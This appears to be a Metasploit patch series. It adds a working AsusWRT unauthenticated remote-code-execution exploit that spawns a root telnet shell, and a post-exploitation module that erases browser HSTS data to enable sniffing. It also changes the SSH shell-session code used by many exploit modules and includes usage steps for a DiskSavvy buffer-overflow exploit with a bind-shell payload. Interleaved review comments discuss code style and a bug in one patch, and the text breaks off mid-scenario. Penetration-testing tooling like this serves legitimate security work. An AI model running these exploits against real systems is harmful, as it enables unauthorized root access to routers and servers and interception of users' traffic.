From c1fe35532986a7854de7a4ca1fc75c925a6a0c67 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro
Date: Mon, 22 Jan 2018 21:44:02 +0700
Subject: [PATCH 01/33] Create exploit for AsusWRT LAN RCE
---
 .../exploits/linux/http/asuswrt_lan_rce.rb | 129 ++++++++++++++++++
 1 file changed, 129 insertions(+)
 create mode 100644 modules/exploits/linux/http/asuswrt_lan_rce.rb
diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb
new file mode 100644
index 0000000000..aa8e4ba1b8
--- /dev/null
+++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb
@@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution', + 'Description' => %q{ + The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to + perform a POST in certain cases. This can be combined with another vulnerability in + the VPN configuration upload routine that sets NVRAM configuration variables directly + from the POST request to enable a special command mode. + This command mode can then be abused by sending a UDP packet to infosvr, which is running + on port UDP 9999 to directly execute commands as root. + This exploit leverages that to start telnetd in a random port, and then connects to it. + It has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743. 
+ }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], + ['URL', 'GITHUB'] + ], + 'Targets' => + [ + [ 'AsusWRT < v3.0.0.4.384.10007', + { + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + } + ], + ], + 'Privileged' => true, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DisclosureDate' => 'Jan 22 2018', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(9999) + ]) + + register_advanced_options( + [ + OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80]) + ]) + end + + def exploit + # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD + # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting! + post_data = Rex::MIME::Message.new + post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"") + + data = post_data.to_s + + res = send_request_cgi({ + 'uri' => "/vpnupload.cgi", + 'method' => 'POST', + 'rport' => datastore['ASUSWRTPORT'], + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + + if res and res.code == 200 + print_good("#{peer} - Successfully set the ateCommand_flag variable.") + else + fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.") + end + + + # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above. 
+ info_pdu_size = 512 # expected packet size, not sure what the extra bytes are + r = Random.new + + ibox_comm_pkt_hdr_ex = + [0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC + [0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15 + [0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33 + r.bytes(4) + # Info, don't know what this is + r.bytes(6) + # MAC address + r.bytes(32) # Password + + telnet_port = rand((2**16)-1024)+1024 + cmd = "/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}" + [0x00].pack('C*') + pkt_syscmd = + [cmd.length,0x00].pack('C*') + # cmd length + cmd # our command + + pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length) + + connect_udp + udp_sock.put(pkt_final) # we could process the response, but we don't care + disconnect_udp + + print_status("#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}") + sleep(10) + + begin + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 }) + if not sock.nil? + print_good("#{peer} - Success, shell incoming!") + return handler(sock) + end + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + sock.close if sock + end + + print_bad("#{peer} - Well that didn't work... try again?") + end +end From b734af4e79271c2283163d503bacabe857d012fd Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Mon, 22 Jan 2018 22:00:48 +0700 Subject: [PATCH 02/33] Add my advisory URL --- modules/exploits/linux/http/asuswrt_lan_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb index aa8e4ba1b8..9cbe0f1d8c 100644 --- a/modules/exploits/linux/http/asuswrt_lan_rce.rb 
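Review bot: `if res and res.code == 200` in `exploit` uses the low-precedence `and`, and `if not sock.nil?` is the long form of a truthiness check; both read as ported code and RuboCop flags them, so `if res && res.code == 200` and `if sock` are the idiomatic spellings. The `rescue ... => e` binding at the end of the same method is never used, so `=> e` can be dropped. The `add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "...")` call assigns throwaway locals inside the argument list; passing the positional values directly, `post_data.add_part('1', nil, nil, "form-data; name=\"ateCommand_flag\"")`, is equivalent and avoids three unused variables.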
+++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'References' =>
 [
 ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],
- ['URL', 'GITHUB']
+ ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt']
 ],
 'Targets' =>
 [
From ae93162faf5a1fb2072dcd8b2d0deb7c1d279d75 Mon Sep 17 00:00:00 2001
From: UnaPibaGeek
Date: Mon, 22 Jan 2018 18:53:16 -0300
Subject: [PATCH 03/33] HSTS eraser module
---
 modules/post/multi/manage/hsts_eraser.rb | 120 +++++++++++++++++++++++
 1 file changed, 120 insertions(+)
 create mode 100644 modules/post/multi/manage/hsts_eraser.rb
diff --git a/modules/post/multi/manage/hsts_eraser.rb b/modules/post/multi/manage/hsts_eraser.rb
new file mode 100644
index 0000000000..a2083d4384
--- /dev/null
+++ b/modules/post/multi/manage/hsts_eraser.rb
@@ -0,0 +1,120 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Windows::UserProfiles + include Msf::Post::OSX::System + include Msf::Post::Unix + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Web browsers HSTS entries eraser', + 'Description' => %q{ + This module removes the HSTS database of the following web browsers: Mozilla Firefox, + Google Chrome, Opera & Safari. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths + ], + 'Platform' => %w(linux osx unix win), + 'References' => + [ + [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ], + [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ] + + ], + 'SessionTypes' => %w(meterpreter shell) + )) + end + + def run + profiles = user_profiles + + profiles.each do |user_profile| + account = user_profile['UserName'] + browsers_hsts_db_path = {} + + case session.platform + when 'windows' + browsers_hsts_db_path = { + 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity", + 'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", #Just path for now + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity" + } + when 'unix', 'linux' + browsers_hsts_db_path = { + 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity", + 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", #Just path for now + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity" + } + when 'osx' + browsers_hsts_db_path = { + 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity", + 
'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", #Just path for now + 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity", + 'Safari' => "#{user_profile['AppData']}/Cookies/HSTS.plist" + } + else + print_error "Platform not recognized: #{session.platform}" + end + + browsers_hsts_db_path.each_pair do |browser, path| + if browser == 'Firefox' + hsts_db_path = [] + if directory?(path) + files = dir(path) + files.reject! { |file| %w(. ..).include?(file) } + files.each do |file_path| + hsts_db_path.push([path, file_path, 'SiteSecurityServiceState.txt'].join(system_separator)) if file_path.match(/.*\.default/) + end + end + path = hsts_db_path[0] + end + if !path.nil? and file?(path) + print_status "Removing #{browser} HSTS database for #{account}... " + file_rm(path) + end + end + end + + print_status "HSTS databases removed! Now enjoy your favorite sniffer! ;-)" + + end + + def user_profiles + user_profiles = [] + case session.platform + when /unix|linux/ + user_names = dir("/home") + user_names.reject! { |u| %w(. ..).include?(u) } + user_names.each do |user_name| + user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}") + end + when /osx/ + user_names = session.shell_command("ls /Users").split + user_names.reject! { |u| u == 'Shared' } + user_names.each do |user_name| + user_profiles.push( + 'UserName' => user_name, + "AppData" => "/Users/#{user_name}/Library", + "LocalAppData" => "/Users/#{user_name}/Library/Application Support" + ) + end + when /windows/ + user_profiles |= grab_user_profiles + else + print_error "Error getting user profile data!" + end + user_profiles + end + + def system_separator + return session.platform == 'windows' ? '\\' : '/' + end + +end \ No newline at end of file From 621868b7fb8c838ad9aa1b031864295cd10bec08 Mon Sep 17 00:00:00 2001 
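Review bot: `if !path.nil? and file?(path)` in `run` combines `!x.nil?` with the low-precedence `and`; `if path && file?(path)` expresses the same condition without the precedence trap. In the same loop `file_path.match(/.*\.default/)` allocates a MatchData that is only used as a boolean — `file_path.match?(/\.default/)` is equivalent (the leading `.*` does nothing on an unanchored pattern), assuming the framework's minimum Ruby already provides `match?`. `system_separator` puts an explicit `return` on its only expression; `session.platform == 'windows' ? '\\' : '/'` alone is the idiomatic body. Note also that the `else` branch of the platform `case` calls `print_error` and then falls through to iterate an empty hash rather than skipping the profile, which is harmless but reads as unintended.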
From: Pedro Ribeiro
Date: Tue, 23 Jan 2018 11:26:39 +0700
Subject: [PATCH 04/33] Add CVE numbers
---
 modules/exploits/linux/http/asuswrt_lan_rce.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb
index 9cbe0f1d8c..81ef45bdb3 100644
--- a/modules/exploits/linux/http/asuswrt_lan_rce.rb
+++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb
@@ -30,7 +30,9 @@ class MetasploitModule < Msf::Exploit::Remote
 'References' =>
 [
 ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],
- ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt']
+ ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
+ ['CVE', '2018-5999'],
+ ['CVE', '2018-6000']
 ],
 'Targets' =>
 [
From 54c6aa7629869d89fae45b289eba944362f955f4 Mon Sep 17 00:00:00 2001
From: Pedro Ribeiro
Date: Fri, 26 Jan 2018 15:35:18 +0700
Subject: [PATCH 05/33] Add full disclosure URL
---
 modules/exploits/linux/http/asuswrt_lan_rce.rb | 1 +
 1 file changed, 1 insertion(+)
diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb
index 81ef45bdb3..66440322dc 100644
--- a/modules/exploits/linux/http/asuswrt_lan_rce.rb
+++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb
@@ -31,6 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
 [
 ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'],
 ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
+ ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'],
 ['CVE', '2018-5999'],
 ['CVE', '2018-6000']
 ],
From eae9c6043015f881fc92e84556cef5aca95af12b Mon Sep 17 00:00:00 2001
From: UnaPibaGeek Date: Sat, 3 Feb 2018 02:18:30 -0300 Subject: [PATCH 06/33] Disclaimer and wget support added and syntax errors fixed. --- modules/post/multi/manage/hsts_eraser.rb | 22 ++++++++++++++++------ 1 file changed, 16 insertions(+), 6 deletions(-) diff --git a/modules/post/multi/manage/hsts_eraser.rb b/modules/post/multi/manage/hsts_eraser.rb index a2083d4384..8d336bf96b 100644 --- a/modules/post/multi/manage/hsts_eraser.rb +++ b/modules/post/multi/manage/hsts_eraser.rb @@ -13,8 +13,8 @@ class MetasploitModule < Msf::Post super(update_info(info, 'Name' => 'Web browsers HSTS entries eraser', 'Description' => %q{ - This module removes the HSTS database of the following web browsers: Mozilla Firefox, - Google Chrome, Opera & Safari. + This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox, + Google Chrome, Opera, Safari and wget. }, 'License' => MSF_LICENSE, 'Author' => @@ -22,17 +22,27 @@ class MetasploitModule < Msf::Post 'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths ], 'Platform' => %w(linux osx unix win), + 'Arch' => [ARCH_X86,ARCH_X64], 'References' => [ [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ], [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ] - ], 'SessionTypes' => %w(meterpreter shell) )) + + register_options([ + OptBool.new('DISCLAIMER', + [true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false]) + ]) end def run + unless (datastore['DISCLAIMER'] == true) + print_error("This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.") + return + end + profiles = user_profiles profiles.each do |user_profile| 
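Review bot: `unless (datastore['DISCLAIMER'] == true)` at the top of `run` compares an OptBool value to `true` inside parentheses; Ruby's guard form reads `unless datastore['DISCLAIMER']` and behaves the same for the true/false values an OptBool yields. In the same hunk `'Arch' => [ARCH_X86,ARCH_X64]` is missing the space after the comma. The rest of `run` continues below this hunk.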
@@ -50,7 +60,8 @@ class MetasploitModule < Msf::Post browsers_hsts_db_path = { 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity", 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", #Just path for now - 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity" + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity", + 'wget' => "#{user_profile['LocalAppData']}/.wget-hsts" } when 'osx' browsers_hsts_db_path = { @@ -116,5 +127,4 @@ class MetasploitModule < Msf::Post def system_separator return session.platform == 'windows' ? '\\' : '/' end - -end \ No newline at end of file +end From b1d0529161259e3cc7c7a5a70f379fd5cd467721 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 8 Feb 2018 02:21:16 -0600 Subject: [PATCH 07/33] prefer 'shell' channels over 'exec' channels for ssh If a command is not specified to CommandStream, request a "shell" session rather than running exec. This allows targets that do not have a true "shell" which supports exec to instead return a raw shell session. --- lib/net/ssh/command_stream.rb | 63 ++++++++++--------- modules/auxiliary/scanner/ssh/ssh_login.rb | 2 +- .../auxiliary/scanner/ssh/ssh_login_pubkey.rb | 2 +- .../apple_ios/ssh/cydia_default_ssh.rb | 2 +- .../ssh/ceragon_fibeair_known_privkey.rb | 2 +- .../linux/ssh/exagrid_known_privkey.rb | 2 +- .../linux/ssh/f5_bigip_known_privkey.rb | 2 +- ...oadbalancerorg_enterprise_known_privkey.rb | 2 +- .../linux/ssh/quantum_dxi_known_privkey.rb | 2 +- .../linux/ssh/quantum_vmpro_backdoor.rb | 2 +- .../exploits/linux/ssh/symantec_smg_ssh.rb | 2 +- .../linux/ssh/ubiquiti_airos_file_upload.rb | 2 +- .../linux/ssh/vmware_vdp_known_privkey.rb | 2 +- .../ssh/array_vxag_vapv_privkey_privesc.rb | 2 +- .../unix/ssh/tectia_passwd_changereq.rb | 2 +- 15 files changed, 48 insertions(+), 43 deletions(-) 
diff --git a/lib/net/ssh/command_stream.rb b/lib/net/ssh/command_stream.rb index f9d82cd518..11ef475d28 100644 --- a/lib/net/ssh/command_stream.rb +++ b/lib/net/ssh/command_stream.rb @@ -15,7 +15,34 @@ class CommandStream attr_accessor :localinfo end - def initialize(ssh, cmd, cleanup = false) + def shell_requested(channel, success) + raise "could not request ssh shell" unless success + channel[:data] = '' + + channel.on_eof do + self.rsock.close rescue nil + self.ssh.close rescue nil + self.thread.kill + end + + channel.on_close do + self.rsock.close rescue nil + self.ssh.close rescue nil + self.thread.kill + end + + channel.on_data do |ch,data| + self.rsock.write(data) + end + + channel.on_extended_data do |ch, ctype, data| + self.rsock.write(data) + end + + self.channel = channel + end + + def initialize(ssh, cmd = nil, cleanup = true) self.lsock, self.rsock = Rex::Socket.tcp_socket_pair() self.lsock.extend(Rex::IO::Stream) @@ -23,7 +50,7 @@ class CommandStream self.rsock.extend(Rex::IO::Stream) self.ssh = ssh - self.thread = Thread.new(ssh,cmd,cleanup) do |rssh,rcmd,rcleanup| + self.thread = Thread.new(ssh,cmd,cleanup) do |rssh, rcmd, rcleanup| begin info = rssh.transport.socket.getpeername_as_array @@ -33,32 +60,10 @@ class CommandStream self.lsock.localinfo = "#{info[1]}:#{info[2]}" rssh.open_channel do |rch| - rch.exec(rcmd) do |c, success| - raise "could not execute command: #{rcmd.inspect}" unless success - - c[:data] = '' - - c.on_eof do - self.rsock.close rescue nil - self.ssh.close rescue nil - self.thread.kill - end - - c.on_close do - self.rsock.close rescue nil - self.ssh.close rescue nil - self.thread.kill - end - - c.on_data do |ch,data| - self.rsock.write(data) - end - - c.on_extended_data do |ch, ctype, data| - self.rsock.write(data) - end - - self.channel = c + if cmd.nil? + rch.send_channel_request("shell", &method(:shell_requested)) + else + rch.exec(rsh, &method(:shell_requested)) end end 
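Review bot: `initialize`'s `cleanup` default flips from `false` to `true` in this hunk, so any caller outside the files touched by this commit that passed only `(ssh, cmd)` now closes the SSH session when the channel ends; worth confirming no such caller remains, since the visible call sites all previously passed `true` explicitly. The new `shell_requested` callback sits above `initialize` with no `private` marker and is also used for the `exec` path, so its name and its fixed `raise "could not request ssh shell"` message mislead when a command request fails; consider marking it private and using a request-neutral message such as `raise "could not open ssh channel"`.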
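Review bot: `rch.exec(rsh, &method(:shell_requested))` references `rsh`, which is not defined anywhere in this block — the thread's parameter is `rcmd` — so passing a command now raises NameError inside the session thread; the line should read `rch.exec(rcmd, &method(:shell_requested))`. The sibling branch tests `cmd.nil?` through the closure instead of the `rcmd` block parameter; `if rcmd.nil?` keeps both branches on the same variable. Callers in this same series that still pass a command, `quantum_vmpro_backdoor.rb` with `'shell-escape'` and `array_vxag_vapv_privkey_privesc.rb` with `build_command`, take this path. The enclosing `Thread.new` block and `initialize` start before and end after this hunk.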
@@ -85,7 +90,7 @@ class CommandStream end # Shut down the SSH session if requested - if(rcleanup) + if rcleanup rssh.close end end diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index b495195fb5..79d5b38083 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary return unless ssh_socket # Create a new session - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) merge_me = { 'USERPASS_FILE' => nil, diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index f0b271e46a..703e8b9094 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -72,7 +72,7 @@ class MetasploitModule < Msf::Auxiliary return unless ssh_socket # Create a new session from the socket - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) # Clean up the stored data - need to stash the keyfile into # a datastore for later reuse. diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index 781db9a106..e0ac301d69 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -110,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote end if ssh - conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index b4f9e873e8..96864ee5b4 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb 
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb index f2304c91a6..5742000cc3 100644 --- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 0cf2138f9e..4fe890b696 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote return false unless ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil conn end diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index bff7067f67..5fb276c2ba 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb 
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 3c4ef23169..0d8a939067 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb index 48714417a1..d2c4f96ea6 100644 --- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb +++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb @@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote end if ssh - conn = Net::SSH::CommandStream.new(ssh, 'shell-escape', true) + conn = Net::SSH::CommandStream.new(ssh, 'shell-escape') return conn end diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index 6f812d10fb..b48a856c9b 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote end if ssh - conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end diff --git a/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb b/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb index 84d547712a..4094cb72a6 100644 
--- a/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb +++ b/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb @@ -153,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote private: private_key, private_type: :ssh_key ) - return Net::SSH::CommandStream.new(ssh, '/bin/sh', true) + return Net::SSH::CommandStream.new(ssh) end nil diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index a914837815..6a688756a5 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb @@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) self.sockets.delete(ssh_socket.transport.socket) return conn diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb index 4ee91ab322..778902cb34 100644 --- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb +++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb @@ -186,6 +186,6 @@ class MetasploitModule < Msf::Exploit::Remote # Make the SSH connection and execute our commands + payload print_status("#{rhost}:#{rport} - Sending and executing payload to gain root privileges!") - Net::SSH::CommandStream.new(ssh, build_command, true) + Net::SSH::CommandStream.new(ssh, build_command) end end diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 53a0a22034..85064b1092 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb 
@@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Remote message = transport.next_message.type if message.to_i == 6 #SSH2_MSG_SERVICE_ACCEPT - shell = Net::SSH::CommandStream.new(connection, '/bin/sh', true) + shell = Net::SSH::CommandStream.new(connection) connection = nil return shell end From 07763ccd6a36fd549b651af1caea70ce2941202b Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Wed, 14 Feb 2018 20:35:03 +0000 Subject: [PATCH 08/33] Disk Savvy Server Buffer Overflow Documentation --- .../exploit/windows/misc/disk_savvy_adm.md | 39 +++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 documentation/modules/exploit/windows/misc/disk_savvy_adm.md diff --git a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md new file mode 100644 index 0000000000..ad83328205 --- /dev/null +++ b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md 
@@ -0,0 +1,39 @@ +## Vulnerable Application + +[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe). + +## Verification Steps + 1. Install a vulnerable DiskSavvy Enterprise + 6. Start `msfconsole` + 3. Do `exploit/windows/misc/disk_savvy_adm` + 4. Do `set RHOST ip` + 5. Do `set PAYLOAD windows/shell/bind_tcp` + 13. Do `exploit` + 7. Enjoy you shell + +## Scenarios + +###DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86 + +``` +msf > use exploit/windows/misc/disk_savvy_adm +msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55 +RHOST => 192.168.216.55 +msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp +payload => windows/shell/bind_tcp +msf 